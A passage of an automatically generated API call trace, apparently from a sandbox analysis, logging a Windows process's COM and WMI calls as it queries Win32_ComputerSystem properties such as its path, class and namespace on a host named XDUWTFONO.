	[0262.415] IClientSecurity:QueryBlanket (in: This=0x6272118, pProxy=0x6272114, pAuthnSvc=0x5eae58c, pAuthzSvc=0x5eae588, pServerPrincName=0x5eae598, pAuthnLevel=0x5eae590, pImpLevel=0x5eae57c, pAuthInfo=0x5eae580, pCapabilites=0x5eae584 | out: pAuthnSvc=0x5eae58c*=0xa, pAuthzSvc=0x5eae588*=0x0, pServerPrincName=0x5eae598, pAuthnLevel=0x5eae590*=0x6, pImpLevel=0x5eae57c*=0x2, pAuthInfo=0x5eae580, pCapabilites=0x5eae584*=0x1) returned 0x0
	[0262.415] IUnknown:Release (This=0x6272118) returned 0x1
	[0262.415] IUnknown:QueryInterface (in: This=0x6272114, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae538 | out: ppvObject=0x5eae538*=0x3ba1cc) returned 0x0
	[0262.415] IUnknown:QueryInterface (in: This=0x6272114, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae534 | out: ppvObject=0x5eae534*=0x6272118) returned 0x0
	[0262.415] IClientSecurity:SetBlanket (This=0x6272118, pProxy=0x6272114, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0262.420] IUnknown:Release (This=0x6272118) returned 0x2
	[0262.420] WbemLocator:IUnknown:Release (This=0x3ba1cc) returned 0x1
	[0262.420] CoTaskMemFree (pv=0x3ace40) 
	[0262.420] IUnknown:Release (This=0x627204c) returned 0x2
	[0262.420] IUnknown:QueryInterface (in: This=0x6272114, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadee0 | out: ppvObject=0x5eadee0*=0x3ba1cc) returned 0x0
	[0262.420] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba1cc, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eade9c | out: ppvObject=0x5eade9c*=0x0) returned 0x80004002
	[0262.422] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba1cc, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadd90 | out: ppvObject=0x5eadd90*=0x0) returned 0x80004002
	[0262.423] WbemLocator:IUnknown:AddRef (This=0x3ba1cc) returned 0x3
	[0262.423] CoGetContextToken (in: pToken=0x5eadd28 | out: pToken=0x5eadd28) returned 0x0
	[0262.424] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba1cc, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadd10 | out: ppvObject=0x5eadd10*=0x3ba12c) returned 0x0
	[0262.424] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3ba12c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadd18 | out: pCid=0x5eadd18*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.424] WbemLocator:IUnknown:Release (This=0x3ba12c) returned 0x3
	[0262.424] CoGetContextToken (in: pToken=0x5eadd20 | out: pToken=0x5eadd20) returned 0x0
	[0262.424] WbemLocator:IUnknown:AddRef (This=0x3ba1cc) returned 0x4
	[0262.424] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba1cc, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadd94 | out: ppvObject=0x5eadd94*=0x3ba1b4) returned 0x0
	[0262.425] WbemLocator:IUnknown:Release (This=0x3ba1cc) returned 0x4
	[0262.425] WbemLocator:IRpcOptions:Query (in: This=0x3ba1b4, pPrx=0x3ba1cc, dwProperty=2, pdwValue=0x5eaddb8 | out: pdwValue=0x5eaddb8) returned 0x80004002
	[0262.425] WbemLocator:IUnknown:Release (This=0x3ba1b4) returned 0x3
	[0262.425] WbemLocator:IUnknown:Release (This=0x3ba1cc) returned 0x2
	[0262.425] CoGetContextToken (in: pToken=0x5eae194 | out: pToken=0x5eae194) returned 0x0
	[0262.425] CoGetContextToken (in: pToken=0x5eae154 | out: pToken=0x5eae154) returned 0x0
	[0262.425] WbemLocator:IUnknown:AddRef (This=0x3ba1cc) returned 0x3
	[0262.425] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba1cc, riid=0x5eae1d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae1cc | out: ppvObject=0x5eae1cc*=0x6272114) returned 0x0
	[0262.425] WbemLocator:IUnknown:Release (This=0x3ba1cc) returned 0x3
	[0262.425] IUnknown:Release (This=0x6272114) returned 0x2
	[0262.426] IUnknown:Release (This=0x6272114) returned 0x1
	[0262.426] CoGetContextToken (in: pToken=0x5eae788 | out: pToken=0x5eae788) returned 0x0
	[0262.426] CoGetContextToken (in: pToken=0x5eae748 | out: pToken=0x5eae748) returned 0x0
	[0262.426] WbemLocator:IUnknown:AddRef (This=0x3ba1cc) returned 0x2
	[0262.426] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba1cc, riid=0x5eae7c4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae7c0 | out: ppvObject=0x5eae7c0*=0x6272114) returned 0x0
	[0262.426] WbemLocator:IUnknown:Release (This=0x3ba1cc) returned 0x2
	[0262.426] IUnknown:AddRef (This=0x6272114) returned 0x3
	[0262.426] IEnumWbemClassObject:Reset (This=0x6272114) returned 0x0
	[0262.430] IUnknown:Release (This=0x6272114) returned 0x2
	[0262.431] CoGetContextToken (in: pToken=0x5eae67c | out: pToken=0x5eae67c) returned 0x0
	[0262.431] IUnknown:AddRef (This=0x6272114) returned 0x3
	[0262.431] IEnumWbemClassObject:Next (in: This=0x6272114, lTimeout=-1, uCount=0x1, apObjects=0x38ef70, puReturned=0x2fe5444 | out: apObjects=0x38ef70*=0x6272150, puReturned=0x2fe5444*=0x1) returned 0x0
	[0262.436] IUnknown:QueryInterface (in: This=0x6272150, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc88 | out: ppvObject=0x5eadc88*=0x6272150) returned 0x0
	[0262.436] IUnknown:QueryInterface (in: This=0x6272150, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadc44 | out: ppvObject=0x5eadc44*=0x0) returned 0x80004002
	[0262.436] IUnknown:QueryInterface (in: This=0x6272150, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadb38 | out: ppvObject=0x5eadb38*=0x0) returned 0x80004002
	[0262.436] IUnknown:AddRef (This=0x6272150) returned 0x3
	[0262.437] CoGetContextToken (in: pToken=0x5eadad0 | out: pToken=0x5eadad0) returned 0x0
	[0262.437] IUnknown:QueryInterface (in: This=0x6272150, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadab8 | out: ppvObject=0x5eadab8*=0x6272154) returned 0x0
	[0262.437] IMarshal:GetUnmarshalClass (in: This=0x6272154, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadac0 | out: pCid=0x5eadac0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0262.437] IUnknown:Release (This=0x6272154) returned 0x3
	[0262.437] CoGetContextToken (in: pToken=0x5eadac8 | out: pToken=0x5eadac8) returned 0x0
	[0262.437] IUnknown:AddRef (This=0x6272150) returned 0x4
	[0262.437] IUnknown:QueryInterface (in: This=0x6272150, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadb3c | out: ppvObject=0x5eadb3c*=0x0) returned 0x80004002
	[0262.437] IUnknown:Release (This=0x6272150) returned 0x3
	[0262.437] IUnknown:Release (This=0x6272150) returned 0x2
	[0262.438] CoGetContextToken (in: pToken=0x5eadf28 | out: pToken=0x5eadf28) returned 0x0
	[0262.438] CoGetContextToken (in: pToken=0x5eadee8 | out: pToken=0x5eadee8) returned 0x0
	[0262.438] IUnknown:AddRef (This=0x6272150) returned 0x3
	[0262.438] IUnknown:QueryInterface (in: This=0x6272150, riid=0x5eadf64*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5eadf60 | out: ppvObject=0x5eadf60*=0x6272150) returned 0x0
	[0262.438] IUnknown:Release (This=0x6272150) returned 0x3
	[0262.438] IUnknown:Release (This=0x6272150) returned 0x2
	[0262.438] IUnknown:Release (This=0x6272150) returned 0x1
	[0262.438] IUnknown:Release (This=0x6272114) returned 0x2
	[0262.438] CoGetContextToken (in: pToken=0x5eae80c | out: pToken=0x5eae80c) returned 0x0
	[0262.438] IUnknown:AddRef (This=0x6272150) returned 0x2
	[0262.439] IWbemClassObject:Get (in: This=0x6272150, wszName="__GENUS", lFlags=0, pVal=0x5eae888*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5eae93c*=0, plFlavor=0x5eae938*=0 | out: pVal=0x5eae888*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5eae93c*=3, plFlavor=0x5eae938*=64) returned 0x0
	[0262.439] IWbemClassObject:Get (in: This=0x6272150, wszName="__PATH", lFlags=0, pVal=0x5eae868*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5eae920*=0, plFlavor=0x5eae91c*=0 | out: pVal=0x5eae868*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x5eae920*=8, plFlavor=0x5eae91c*=64) returned 0x0
	[0262.439] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0262.439] CoGetObjectContext (in: riid=0x2b3adb0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae8c0 | out: ppv=0x5eae8c0*=0x2d8dec) returned 0x0
	[0262.439] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae8b8 | out: pAptType=0x5eae8b8*=1) returned 0x0
	[0262.439] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2b3ad98*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae8bc | out: ppvObject=0x5eae8bc*=0x0) returned 0x80004002
	[0262.439] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0262.440] CoGetClassObject (in: rclsid=0x38bb74*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae3d8 | out: ppv=0x5eae3d8*=0x626dee8) returned 0x0
	[0262.440] WbemDefPath:IUnknown:QueryInterface (in: This=0x626dee8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae208 | out: ppvObject=0x5eae208*=0x0) returned 0x80004002
	[0262.440] WbemDefPath:IClassFactory:CreateInstance (in: This=0x626dee8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae240 | out: ppvObject=0x5eae240*=0x6271ee8) returned 0x0
	[0262.440] WbemDefPath:IUnknown:QueryInterface (in: This=0x6271ee8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadfe4 | out: ppvObject=0x5eadfe4*=0x6271ee8) returned 0x0
	[0262.441] WbemDefPath:IUnknown:QueryInterface (in: This=0x6271ee8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadfa0 | out: ppvObject=0x5eadfa0*=0x0) returned 0x80004002
	[0262.441] WbemDefPath:IUnknown:AddRef (This=0x6271ee8) returned 0x3
	[0262.441] CoGetContextToken (in: pToken=0x5eade2c | out: pToken=0x5eade2c) returned 0x0
	[0262.441] WbemDefPath:IUnknown:QueryInterface (in: This=0x6271ee8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade14 | out: ppvObject=0x5eade14*=0x3bd3c8) returned 0x0
	[0262.441] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x3bd3c8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eade1c | out: pCid=0x5eade1c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.441] WbemDefPath:IUnknown:Release (This=0x3bd3c8) returned 0x3
	[0262.442] CoGetContextToken (in: pToken=0x5eade24 | out: pToken=0x5eade24) returned 0x0
	[0262.442] WbemDefPath:IUnknown:AddRef (This=0x6271ee8) returned 0x4
	[0262.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6271ee8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade98 | out: ppvObject=0x5eade98*=0x0) returned 0x80004002
	[0262.442] WbemDefPath:IUnknown:Release (This=0x6271ee8) returned 0x3
	[0262.442] WbemDefPath:IUnknown:Release (This=0x6271ee8) returned 0x2
	[0262.442] WbemDefPath:IUnknown:Release (This=0x626dee8) returned 0x0
	[0262.442] WbemDefPath:IUnknown:Release (This=0x6271ee8) returned 0x1
	[0262.442] CoGetContextToken (in: pToken=0x5eae6d4 | out: pToken=0x5eae6d4) returned 0x0
	[0262.442] CoGetContextToken (in: pToken=0x5eae694 | out: pToken=0x5eae694) returned 0x0
	[0262.442] WbemDefPath:IUnknown:AddRef (This=0x6271ee8) returned 0x2
	[0262.443] WbemDefPath:IUnknown:QueryInterface (in: This=0x6271ee8, riid=0x5eae710*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae70c | out: ppvObject=0x5eae70c*=0x6271ee8) returned 0x0
	[0262.443] WbemDefPath:IUnknown:Release (This=0x6271ee8) returned 0x2
	[0262.443] WbemDefPath:IUnknown:Release (This=0x6271ee8) returned 0x1
	[0262.443] CoGetContextToken (in: pToken=0x5eae754 | out: pToken=0x5eae754) returned 0x0
	[0262.443] CoGetContextToken (in: pToken=0x5eae714 | out: pToken=0x5eae714) returned 0x0
	[0262.443] WbemDefPath:IUnknown:AddRef (This=0x6271ee8) returned 0x2
	[0262.443] WbemDefPath:IUnknown:QueryInterface (in: This=0x6271ee8, riid=0x5eae790*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae78c | out: ppvObject=0x5eae78c*=0x6271ee8) returned 0x0
	[0262.443] WbemDefPath:IUnknown:Release (This=0x6271ee8) returned 0x2
	[0262.443] WbemDefPath:IUnknown:AddRef (This=0x6271ee8) returned 0x3
	[0262.443] WbemDefPath:IWbemPath:SetText (This=0x6271ee8, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0262.444] WbemDefPath:IUnknown:Release (This=0x6271ee8) returned 0x2
	[0262.444] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626de40, puCount=0x5eae8f4 | out: puCount=0x5eae8f4*=0x2) returned 0x0
	[0262.444] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae8f0*=0x0, pszText=0x0 | out: puBuffLength=0x5eae8f0*=0x17, pszText=0x0) returned 0x0
	[0262.444] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae8f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae8f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.444] CoGetContextToken (in: pToken=0x5eae67c | out: pToken=0x5eae67c) returned 0x0
	[0262.444] IUnknown:AddRef (This=0x6272114) returned 0x3
	[0262.444] IEnumWbemClassObject:Next (in: This=0x6272114, lTimeout=-1, uCount=0x1, apObjects=0x38ef70, puReturned=0x2fe5444 | out: apObjects=0x38ef70*=0x0, puReturned=0x2fe5444*=0x0) returned 0x1
	[0262.459] IUnknown:Release (This=0x6272114) returned 0x2
	[0262.459] CoGetContextToken (in: pToken=0x5eae7c4 | out: pToken=0x5eae7c4) returned 0x0
	[0262.459] WbemLocator:IUnknown:Release (This=0x3ba1cc) returned 0x1
	[0262.459] IUnknown:Release (This=0x6272114) returned 0x0
	[0262.462] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626de40, puCount=0x5eae968 | out: puCount=0x5eae968*=0x2) returned 0x0
	[0262.462] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae964*=0x0, pszText=0x0 | out: puBuffLength=0x5eae964*=0x17, pszText=0x0) returned 0x0
	[0262.462] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae964*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae964*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.462] IWbemClassObject:Get (in: This=0x6272150, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae924*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe625c*=0, plFlavor=0x2fe6260*=0 | out: pVal=0x5eae924*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x2fe625c*=8, plFlavor=0x2fe6260*=64) returned 0x0
	[0262.462] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0262.462] IWbemClassObject:Get (in: This=0x6272150, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae928*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe625c*=8, plFlavor=0x2fe6260*=64 | out: pVal=0x5eae928*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x2fe625c*=8, plFlavor=0x2fe6260*=64) returned 0x0
	[0262.462] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0262.463] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626de40, puCount=0x5eae968 | out: puCount=0x5eae968*=0x2) returned 0x0
	[0262.463] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae964*=0x0, pszText=0x0 | out: puBuffLength=0x5eae964*=0x17, pszText=0x0) returned 0x0
	[0262.463] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae964*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae964*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.463] IWbemClassObject:Get (in: This=0x6272150, wszName="__CLASS", lFlags=0, pVal=0x5eae924*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe6314*=0, plFlavor=0x2fe6318*=0 | out: pVal=0x5eae924*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x2fe6314*=8, plFlavor=0x2fe6318*=64) returned 0x0
	[0262.463] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0262.463] IWbemClassObject:Get (in: This=0x6272150, wszName="__CLASS", lFlags=0, pVal=0x5eae928*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe6314*=8, plFlavor=0x2fe6318*=64 | out: pVal=0x5eae928*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x2fe6314*=8, plFlavor=0x2fe6318*=64) returned 0x0
	[0262.463] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0262.463] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626de40, puCount=0x5eae958 | out: puCount=0x5eae958*=0x2) returned 0x0
	[0262.463] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae954*=0x0, pszText=0x0 | out: puBuffLength=0x5eae954*=0x17, pszText=0x0) returned 0x0
	[0262.463] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae954*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae954*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.463] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626de40, puCount=0x5eae958 | out: puCount=0x5eae958*=0x2) returned 0x0
	[0262.463] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae954*=0x0, pszText=0x0 | out: puBuffLength=0x5eae954*=0x17, pszText=0x0) returned 0x0
	[0262.463] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae954*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae954*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.464] IWbemClassObject:GetNames (in: This=0x6272150, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5eae91c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5eae8e8 | out: pNames=0x5eae8e8*="\x01ƀ\x04") returned 0x0
	[0262.464] SafeArrayGetDim (psa=0x3acd60) returned 0x1
	[0262.464] SafeArrayGetDim (psa=0x3acd60) returned 0x1
	[0262.464] SafeArrayGetLBound (in: psa=0x3acd60, nDim=0x1, plLbound=0x5eae4e4 | out: plLbound=0x5eae4e4) returned 0x0
	[0262.464] IWbemClassObject:Get (in: This=0x6272150, wszName="__GENUS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe6e6c*=0, plFlavor=0x2fe6e70*=0 | out: pVal=0x5eae914*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x2fe6e6c*=3, plFlavor=0x2fe6e70*=64) returned 0x0
	[0262.465] IWbemClassObject:Get (in: This=0x6272150, wszName="__CLASS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe6ea0*=0, plFlavor=0x2fe6ea4*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x2fe6ea0*=8, plFlavor=0x2fe6ea4*=64) returned 0x0
	[0262.465] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0262.465] IWbemClassObject:Get (in: This=0x6272150, wszName="__SUPERCLASS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe6f04*=0, plFlavor=0x2fe6f08*=0 | out: pVal=0x5eae914*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe6f04*=8, plFlavor=0x2fe6f08*=64) returned 0x0
	[0262.465] IWbemClassObject:Get (in: This=0x6272150, wszName="__DYNASTY", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe6f2c*=0, plFlavor=0x2fe6f30*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x2fe6f2c*=8, plFlavor=0x2fe6f30*=64) returned 0x0
	[0262.465] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
